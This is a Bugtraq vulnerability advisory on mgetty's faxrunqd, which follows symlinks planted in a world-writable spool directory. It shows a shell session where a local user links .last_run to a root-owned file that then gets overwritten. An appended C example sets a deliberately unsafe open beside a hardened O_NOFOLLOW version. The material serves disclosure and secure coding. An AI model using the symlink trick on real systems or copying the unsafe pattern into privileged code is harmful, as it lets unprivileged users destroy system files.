Bugtraq mailing list archives
Advisory: mgetty local compromise
From: Stan Bubrouski <satan () FASTDIAL NET>
Date: Sat, 26 Aug 2000 02:23:05 -0400
Author            : Stan Bubrouski
Date              : August 26, 2000
Package           : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity          : faxrunqd follows symbolic links when creating certain
                    files. The default location for the files is
                    /var/spool/fax/outgoing, which is a world-writable
                    directory. Local users can destroy the contents of any
                    file on a mounted filesystem because faxrunqd is usually
                    run by root.

Problem :

mgetty comes with a program named faxrunqd, which is a daemon to send fax
jobs queued by faxspool(1). Upon successful execution, a file named
.last_run is created in the /var/spool/fax/outgoing/ directory which is
world-writable. The problem lies in the fact faxrunqd will follow symlinks
created by any user, allowing file creation anywhere and allowing existing
files to be overwritten/destroyed.

Example:

Remote unprivileged user:

[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt   3 root     root         1024 Jun  2 18:46 .
drwxr-xr-x   4 root     root         1024 Jun  2 18:46 ..
drwxrwxrwx   2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--   1 root     root           12 Jun  2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt   3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x   4 root     root         1024 Jun  2 18:46 ..
lrwxrwxrwx   1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx   2 root     root         1024 Jun  1 00:47 locks

Root console:

[root@king /tmp]# faxrunqd -l ttyS0
...

Remote unprivileged user:

[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt   3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x   4 root     root         1024 Jun  2 18:48 ..
lrwxrwxrwx   1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx   2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--   1 root     root           44 Jun  2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun  2 18:48:47 2000
/usr/sbin/faxrunqd
[user@king /tmp]$

Believed to be vulnerable:

Red Hat Linux 6.2 and all prior versions (Vulnerable)
Linux-Mandrake 7.1 and all prior versions (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1 (Untested)
LinuxPPC 1999 and 2000 (Untested)
TurboLinux 4.0, 6.0 (Untested)
Debian 2.2 (potato), 2.1 (slink) (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2 (Untested)
MkLinux Pre Release 1 (R1) (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4 (Untested)
Think Blue Linux 1.0 (Linux for the S/390) (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...

Believed to be unaffected:

SuSE - all versions
Slackware - all versions
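The file-creation pattern behind the advisory, shown as an added example that is not code from the advisory or from the mgetty project: a privileged process writing a status file into a directory other users can write to. The scratch directory, the file names (smash_me, .last_run) and the two helper functions are constructed for the demonstration; the real fax spool is not touched. The unsafe function follows a symlink planted at the status-file path and truncates whatever it points at, while the hardened one uses O_NOFOLLOW and an fstat(2) check on the opened descriptor so a symlink is refused with ELOOP and a hard link or foreign file is refused before anything is truncated.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the advisory describes: the status file is created with plain
 * O_CREAT|O_TRUNC inside a world-writable directory. If another user has
 * placed a symlink at `path`, open(2) follows it and truncates the target. */
int create_status_file_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened variant for the same call site. O_NOFOLLOW makes open(2) fail
 * with ELOOP when the final path component is a symlink. We open without
 * O_TRUNC, then inspect the descriptor with fstat(2) and refuse anything
 * that is not a regular file with a single link owned by us; only then do
 * we truncate. Returns the descriptor, or -1 with errno set. */
int create_status_file_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    if (ftruncate(fd, 0) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Helper (constructed): write `text` to `path`; 0 on success, -1 on error. */
static int write_file(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, text, strlen(text));
    close(fd);
    return n == (ssize_t)strlen(text) ? 0 : -1;
}

/* Helper (constructed): size in bytes of the object at `path`, or -1. */
static long file_size(const char *path)
{
    struct stat st;
    return lstat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Reproduces the advisory's scenario in a private scratch directory: a
 * "smash_me" file and a symlink named .last_run pointing at it. Returns 1
 * when the hardened open refused the link with ELOOP and left the target
 * intact while the unsafe open followed the link and truncated it. */
int run_symlink_demo(void)
{
    char dir[] = "/tmp/faxdemo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 0;
    char target[256], link[256];
    snprintf(target, sizeof target, "%s/smash_me", dir);
    snprintf(link, sizeof link, "%s/.last_run", dir);
    const char *msg = "Smash me!!!\n";
    int ok = 0;

    if (write_file(target, msg) == 0 && symlink(target, link) == 0) {
        /* Hardened open: must fail with ELOOP, target keeps its 12 bytes. */
        int fd = create_status_file_safe(link);
        int refused = (fd < 0 && errno == ELOOP);
        if (fd >= 0)
            close(fd);
        long after_safe = file_size(target);

        /* Unsafe open: follows the link and truncates the target to 0. */
        fd = create_status_file_unsafe(link);
        if (fd >= 0)
            close(fd);
        long after_unsafe = file_size(target);

        ok = refused && after_safe == (long)strlen(msg) && after_unsafe == 0;
    }
    unlink(link);
    unlink(target);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("hardened open refused the symlink, unsafe open followed it: %s\n",
           run_symlink_demo() ? "yes" : "no");
    return 0;
}
```

The fstat check matters because O_NOFOLLOW alone only stops symlinks: a hard link, or a pre-existing file owned by someone else, still passes the open and would be truncated by O_TRUNC. The more complete fix, which the advisory's Severity line points at, is not to create the file in a world-writable directory in the first place.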